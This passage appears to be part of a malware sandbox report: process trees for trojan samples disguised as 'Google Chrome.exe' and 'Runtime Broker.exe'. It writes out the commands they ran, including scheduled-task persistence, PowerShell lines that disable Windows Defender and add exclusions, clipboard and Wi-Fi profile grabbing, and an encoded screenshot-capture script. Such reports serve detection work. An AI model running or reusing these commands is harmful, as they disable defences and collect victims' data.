  - System Location Discovery: System Language Discovery
  PID:5412
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-c12669ff-8302-4f83-9f11-22f8eaa78c3a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5480
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4400
- - C:\Users\Admin\AppData\Local\Temp\MW-c12669ff-8302-4f83-9f11-22f8eaa78c3a\files\K1NG_Spoffer.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-c12669ff-8302-4f83-9f11-22f8eaa78c3a\files\K1NG_Spoffer.exe"
    3⤵
    - Executes dropped EXE
    PID:5448
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ywwwpuxd\ywwwpuxd.cmdline"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5584
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES887B.tmp" "c:\Users\Admin\AppData\Local\Temp\ywwwpuxd\CSCFDE5C3962C60419AA6C9AEFA1A40FC.TMP"
        5⤵
        
        PID:5332
  - - C:\Users\Admin\AppData\Local\Temp\K1NG_Spoffer.exe
      "C:\Users\Admin\AppData\Local\Temp\K1NG_Spoffer.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5944
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX6\Google Chrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX6\Google Chrome.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1472
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp2940.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5648
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp2980.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4076
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-c12669ff-8302-4f83-9f11-22f8eaa78c3a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-c12669ff-8302-4f83-9f11-22f8eaa78c3a\files"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5992

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:3080

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\k1NGspoffer\K1NG_Spoffer.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\k1NGspoffer\K1NG_Spoffer.exe"
1⤵
PID:3648
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chrome.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chrome.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2432
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpA4AD.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5136
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpA4FD.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3500
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe"
  2⤵
  - Executes dropped EXE
  PID:5480
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe"
    3⤵
    - Executes dropped EXE
    PID:4688

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime\Rumtime.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime\Rumtime.exe"
1⤵
- Modifies registry class
PID:4364
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zlgruj1v\zlgruj1v.cmdline"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4356
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC11F.tmp" "c:\Users\Admin\AppData\Local\Temp\zlgruj1v\CSC918DABA432594F19B8553CDC45EE972F.TMP"
    3⤵
    PID:3876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4680

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime\Rumtime.msi"
1⤵
- Enumerates connected drives
PID:2856

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime\Runtime Broker.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime\Runtime Broker.exe"
1⤵
PID:5700

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime911\Runtime broker.msi"
1⤵
- Enumerates connected drives
PID:5992

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime4543\Runtime broker2.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\runtime4543\Runtime broker2.exe"
1⤵
PID:3332
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runtime Broker.exe"
  2⤵
  - Executes dropped EXE
  PID:3136
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runhelper.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runhelper.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3144
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp70D7.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:460
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp7117.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5468

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\timaverkni.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\timaverkni.exe"
1⤵
PID:5200
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbmrswfq\sbmrswfq.cmdline"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:5208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC98.tmp" "c:\Users\Admin\AppData\Local\Temp\sbmrswfq\CSC6F4E49B311174713A579B19ED6812E.TMP"
    3⤵
    PID:1944
- C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:928
- - C:\Users\Admin\AppData\Local\Temp\RarSFX7\Runtime Broker.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX7\Runtime Broker.exe"
    3⤵
    - Executes dropped EXE
    PID:5388
- - C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1656
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:5016

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\timaverkni 2.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\timaverkni 2.exe"
1⤵
- Modifies registry class
PID:5436
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX5\hello.docx" /o ""
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:5376

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\svchost.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\svchost.exe"
1⤵
PID:6008
- C:\Users\Admin\AppData\Local\Temp\RarSFX6\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX6\Runtime Broker.exe"
  2⤵
  - Executes dropped EXE
  PID:3296
- C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe"
  2⤵
  - Executes dropped EXE
  PID:5024
- - C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe'"
      4⤵
      PID:3500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX6\runexehelper.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:1388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1408
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1752
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:4984
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:6112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:3380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6028
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1952
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5380
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5580
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:2112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:2768
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\33tua2yl\33tua2yl.cmdline"
        6⤵
        
        PID:3236
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
